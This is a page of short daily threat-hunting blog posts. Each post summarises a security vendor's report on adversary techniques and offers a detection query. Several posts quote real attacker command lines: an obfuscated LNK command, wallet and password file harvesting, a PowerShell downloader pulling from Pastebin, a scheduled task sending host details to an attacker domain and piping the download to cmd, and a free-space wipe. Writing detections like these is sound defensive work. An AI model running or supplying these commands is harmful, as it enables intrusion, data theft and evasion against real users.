Posts

Showing posts from June, 2025

166. Detecting Windows Problem Reporting Abuse

Hello everyone! You can get detection and hunting ideas not only from threat actors' behaviors, but also from security researchers! For example, Adam shared an interesting case of Windows Problem Reporting abuse. This executable has many command line arguments, and the -boot argument makes it load the following DLL: C:\Windows\System32\offdmpsvc.dll. It isn't present by default, so an adversary can write a payload there. That means we can use this argument for detection:

event_type: "processcreatewin" AND proc_file_name: "wermgr.exe" AND cmdline: "boot"

See you tomorrow!

165. FIN6 Abuses IE Per-User Initialization Utility

Hello everyone! Let's look at another curious example of the System Binary Proxy Execution (T1218) technique. DomainTools reported on a FIN6 (Skeleton Spider) campaign that included phishing with fake resumes. The adversary distributed archives containing malicious LNK files. The file executed an obfuscated command, for example:

%ComSpec%" /v /c (for %l in (s) do @set "Alter=%~l") && !Alter!et "Trick=ure = " && !Alter!et "Drawings=-base" && !Alter!et "Person=version" && !Alter!et "Twist=." && !Alter!et "Involves=$win" && !Alter!et "Genius=si" && !Alter!et "Streams=d" && !Alter!et "Grass=t" && !Alter!et "Builders=c" && !Alter!et "Armor=settings" && !Alter!et "Disorder=e" && !Alter!et "Womens=ni" && !Alter!et "Cloth=a" && !Alter!et ...

164. Ransomware Gang Abuses Legitimate Employee Monitoring Software

Hello everyone! Threat actors are always adding new tools to their arsenal. This Symantec report on Fog Ransomware proves it one more time. Among other uncommon tools, the adversary leveraged Syteca, a legitimate security solution that records on-screen activity, monitors keystrokes, etc. The threat actors even used PsExec and SMBExec to execute the tool on remote systems, for example:

cmd.exe /Q /c SytecaClient.exe 1> \\127.0.0.1\ADMIN$\__1748095766.8385904 2>&1

As it's a legitimate tool, it's quite easy to detect, for example:

event_type: "processcreatewin" AND proc_file_productname: "syteca"

See you tomorrow!

163. A Curious Case of Iediagcmd.exe Abuse

Hello everyone! Reading Check Point's report on Stealth Falcon activities, I spotted an interesting way of abusing iediagcmd.exe. The adversary uses malicious .url files whose URL parameter points to iediagcmd.exe. Normally this executable spawns additional processes to collect diagnostic data, including route.exe. The .url file changes the working folder to an attacker-controlled WebDAV server, so iediagcmd.exe runs route.exe from \\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr\route.exe (Horus Loader) instead of the legitimate one in the system32 folder. Of course, we can use this for detection and search for iediagcmd.exe executing files from WebDAV servers, for example:

event_type: "processcreatewin" AND proc_p_file_path: "iediagcmd.exe" AND proc_file_path: "DavWWWRoot"

See you tomorrow!

162. That's How Threat Actors Steal Cryptocurrency Wallet Credentials and Seed Phrases

Hello everyone! Adversaries may have various motivations to conduct cyber attacks, but most of them are interested in getting some money, at least at some point! Kaspersky released a report on an activity cluster we track as Rare Werewolf (or Librarian Ghouls, as they call it). You can find lots of curious things to detect and hunt in the report, but let's focus on collecting cryptocurrency wallet credentials and seed phrases:

%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*парол*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*карт*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*кошельк*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\wallet.dat /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*wallet*.doc* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYS...

161. Adversaries Leverage DNS over HTTPS (DoH) to Evade Detection

Hello everyone! Let's look at a curious example of the Protocol Tunneling technique (T1572) as seen in a recent report by SentinelOne. The adversary used a ShadowPad variant that leveraged DNS over HTTPS (DoH) in an attempt to evade detection. To obscure DNS traffic, the threat actors Base64-encoded the queried domains, for example:

https://8.8.8.8:443/dns-query?dns=AAABAAABAAAAAAAABG5ld3MKaW1hZ2luZXJqcANjb20AAAEAAQ

So, if you have related telemetry, you know what to hunt for! See you tomorrow!

160. Detecting Recent Kimsuky Campaign

Hello everyone! The Genians Security Center (GSC) reported on a recent Kimsuky campaign (we track this activity cluster as Monolithic Werewolf), which took place between March and April 2025. Interestingly, the adversary leveraged multiple communication channels to distribute malicious files, including email, Facebook and Telegram. The installation process is quite noisy, as always, so we have lots of detection opportunities. For example, the threat actors abused PowerShell and certutil for decoding:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\ffBqrQ6.rppn C:\Windows\..\ProgramData\sRPCU5y.evJl

A good candidate for detection, right?

event_type: "processcreatewin" AND proc_file_name: "powershell.exe" AND cmdline: ("certutil" AND "decode")

One more thing: abusing reg.exe to achieve persistence:

reg add HKCU\Software\Microsoft\Windows\CurrentVersio...

159. Hunting for Backdoored Game Cheats

Hello everyone! Malware distribution through game cheats isn't a new phenomenon, so it's important to be able to detect related activity. Let's look into a fresh report by Unit42 on new Windows-based malware called Blitz. The malware author used social media to distribute Blitz through game cheat packages. The threat actor abused PowerShell to deliver the Blitz downloader:

powershell.exe -c \"$ProgressPreference = 'SilentlyContinue'; $p=\\\"$env: LOCALAPPDATA\\Microsoft\\Internet Explorer\\ieapfltr.dll\\\"; $hu='https://pastebin.com/ raw/FSzik5ew'; $du=(irm 'https://pastebin.com/raw/RzLEd17Z');if (Test-Path $p) {$eh=irm $hu;if($eh. Length -eq 64 -and $eh -match '^[a-fA-F0-9]{64}$'){$ah=(Get-FileHash $p -Algorithm SHA256).Hash;if ($eh -ne $ah) {iwr $du -OutFile $p}}}else{iwr $du -OutFile $p}\"

Let's focus on Pastebin and iwr to build our hunting query:

event_type: "processcreatewin" AND proc_file_name: "powe...

158. Here's How TA397 Abuses Task Scheduler

Hello everyone! Proofpoint, in collaboration with Threatray, released a report on TA397 activities. Threat researchers assess that it's a state-sponsored adversary focused on intelligence gathering. The threat actors actively abused Task Scheduler. A very common technique, but the command seemed interesting to me:

"C:\\Windows\\System32\\conhost.exe" --headless cmd /c ping localhost > nul & schtasks /create /tn "EdgeTaskUI" /f /sc minute /mo 16 /tr "conhost --headless powershell -WindowStyle Minimized irm "woodstocktutors[.]com/jbc.php? fv=$env:COMPUTERNAME*$env:USERNAME" -OutFile "C:\\Users\\public\\kwe.cc"; Get-Content "C:\\Users\\public\\kwe.cc" | cmd"

First of all, the adversary extensively uses conhost.exe in "headless" mode; I'm sure you already have this hunt in your library:

event_type: "processcreatewin" AND proc_file_name: "conhost.exe" AND cmdline: "headless...

157. Aspia: An RMM in a Partisan Hands

Hello everyone! I have an addition to your hunting collection related to RMMs! Yes, I know. Yes, one more. That's life! So, Kaspersky shared a report on Cyber Partisans (we track this activity cluster as Guerrilla Hyena). Among other malware and tools, the adversary leveraged an RMM called Aspia Remote Desktop. Interestingly, this tool isn't listed in the LOLRMM project, so it's a good idea to have a hunting query:

event_type: "processcreatewin" AND proc_file_productname: "aspia"

See you tomorrow!

156. Threat Actors Abuse OpenSSH to Run a Simple Backdoor

Hello everyone! LOLBAS are everywhere! And we see more and more of them abused by real adversaries. For example, OpenSSH, which is included in newer versions of Windows! Xavier Mertens shared a curious example of how threat actors abuse it. The adversary executes ssh.exe with a custom configuration file:

C:\Windows\System32\OpenSSH\ssh.exe -F "C:\Windows\Temp\config"

So, for example, we can hunt for ssh.exe executed with -F and a config file located under the Temp folder:

event_type: "processcreatewin" AND proc_file_name: "ssh.exe" AND cmdline: ("f" AND "temp")

See you tomorrow!

155. Is Abusing Browser Extensions Noisy Enough?

Hello everyone! I don't often see malicious browser extensions in the wild. So this report by Positive Technologies definitely deserves attention. Although abusing browser extensions isn't the most common technique, the report shows that the installation process is extremely noisy. For example, the threat actors kill browser-related processes:

var kalee = ["taskkill /F /IM chrome.exe", "taskkill /F /IM msedge.exe", "taskkill /F /IM brave.exe"];

Definitely worth a detector, right?

event_type: "processcreatewin" AND proc_file_name: "taskkill.exe" AND cmdline: ("chrome" OR "msedge" OR "brave")

Also, the threat actors collect information about the compromised system by abusing ipinfo[.]io, for example:

for /f "delims=" %%a in ('powershell -command "(Invoke-RestMethod https://ipinfo.io/json).ip"') do set "IP_PUBLICO=%%a"

Yes, another legitimate service we can use f...

154. Threat Actors Abuse Google Apps Script for Phishing

Hello everyone! Let's talk a bit about phishing. We always tell users to check the URL. And threat actors know it! That's why they always try to make it look as legitimate as possible. Cofense Phishing Defense Center shared information on a phishing campaign in which threat actors abused Google Apps Script. Why? It made the phishing page look legitimate, as it was hosted on script[.]google[.]com. Seems like a good thing to hunt for? Why not!

event_type: "dnsreq" AND dns_rname: "script.google.com"

See you tomorrow!

153. Here's How Threat Actors Hinder Forensic Recovery

Hello everyone! I'm sure you love forensics. I do! But threat actors... I don't think so. That's why they have various techniques in their arsenal to hinder forensic analysis and recovery! For example, CyberLock. The adversary abused cipher.exe to erase free space and hinder forensic recovery:

Start-Process cipher.exe -ArgumentList "/w:C:\" -WindowStyle Hidden

Of course, hunting for ransomware isn't a good idea, but we can face this procedure in other cases as well, for example, wiping free space after deleting the toolset. So it may also be a good candidate for a hunting query:

event_type: "processcreatewin" AND proc_file_originalfilename: "cipher.exe"

See you tomorrow!

152. Beyond Good Ol' Windows Command Shell

Hello everyone! It's definitely not a secret that adversaries often abuse various command and scripting interpreters, such as Windows Command Shell and PowerShell. But in some cases they bring their own tools to execute commands on the compromised system. For example, NirCmd, a small utility that lets threat actors perform various tasks without displaying any user interface. Here's an example of how Rare Werewolf abused this tool:

schtasks /create /tn "AutoUpdate Driver" /tr "C:\Users\admin\Window\nircmd.exe exec hide C:\Users\admin\Window\bat2.bat" /sc hourly /st 00:00 /ru SYSTEM /f

Definitely, this utility is worth a hunting query:

event_type: "processcreatewin" AND proc_file_originalfilename: "nircmd.exe" AND cmdline: "hide"

See you tomorrow!